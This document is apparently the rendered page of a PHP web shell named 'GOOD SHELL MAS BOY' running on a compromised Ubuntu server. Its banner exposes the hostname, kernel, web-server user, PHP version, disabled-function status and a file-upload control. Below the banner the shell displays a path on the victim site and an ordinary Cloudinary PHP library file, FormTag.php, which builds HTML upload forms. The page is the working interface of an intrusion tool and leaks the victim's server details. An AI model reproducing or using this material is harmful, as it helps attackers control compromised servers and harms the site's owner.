GOOD SHELL MAS BOY
Server: Apache/2.4.52 (Ubuntu)
System: Linux vmi1836763.contaboserver.net 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
User: www-data (33)
PHP: 8.4.10
Disabled: NONE
Upload Files
File: /var/www/admin.fixgini.com/vendor/cloudinary/cloudinary_php/src/Tag/FormTag.php
<?php
/**
 * This file is part of the Cloudinary PHP package.
 *
 * (c) Cloudinary
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Cloudinary\Tag;

use Cloudinary\Api\HttpMethod;
use Cloudinary\ArrayUtils;

/**
 * Generates an HTML `<form>` tag, for example:
 *
 *
 * ```
 * <form enctype="multipart/form-data" action=API_URL method="POST"/>
 * <input name="timestamp" type="hidden" value="\d+">
 * <input name="public_id" type="hidden" value="hello">
 * <input name="signature" type="hidden" value="[0-9a-f]+">
 * <input name="api_key" type="hidden" value="1234">
 * </form>
 * ```
 *
 * @api
 *
 */
class FormTag extends BaseConfigurableApiTag
{
    const NAME = 'form';

    /**
     * @var array $attributes An array of tag attributes.
     */
    protected $attributes = [
        'enctype' => 'multipart/form-data',
        'method'  => HttpMethod::POST,
    ];

    /**
     * Serializes the tag attributes.
     *
     * @param array $attributes Optional. Additional attributes to add without affecting the tag state.
     *
     * @return string
     *
     * @internal
     */
    public function serializeAttributes($attributes = [])
    {
        $attributes['action'] = $this->uploadApi->getUploadUrl($this->assetType);

        return parent::serializeAttributes($attributes);
    }

    /**
     * Returns input tags that are appended to the form tag.
     *
     * For example:
     * ```
     * <input name="timestamp" type="hidden" value="\d+"\/>
     * <input name="public_id" type="hidden" value="hello"\/>
     * <input name="signature" type="hidden" value="[0-9a-f]+"\/>
     * <input name="api_key" type="hidden" value="1234"\/>
     * ```
     *
     * @param array $additionalContent        The additional content.
     * @param bool  $prependAdditionalContent Whether to prepend additional content (instead of append).
     *
     * @return string
     *
     * @internal
     */
    public function serializeContent($additionalContent = [], $prependAdditionalContent = false)
    {
        $inputTags    = [];
        $uploadParams = $this->getUploadParams();

        foreach ($uploadParams as $key => $value) {
            $inputTags[] = (string)(new FormInputTag($key, $value));
        }

        return parent::serializeContent(
            ArrayUtils::mergeNonEmpty($inputTags, $additionalContent),
            $prependAdditionalContent
        );
    }
}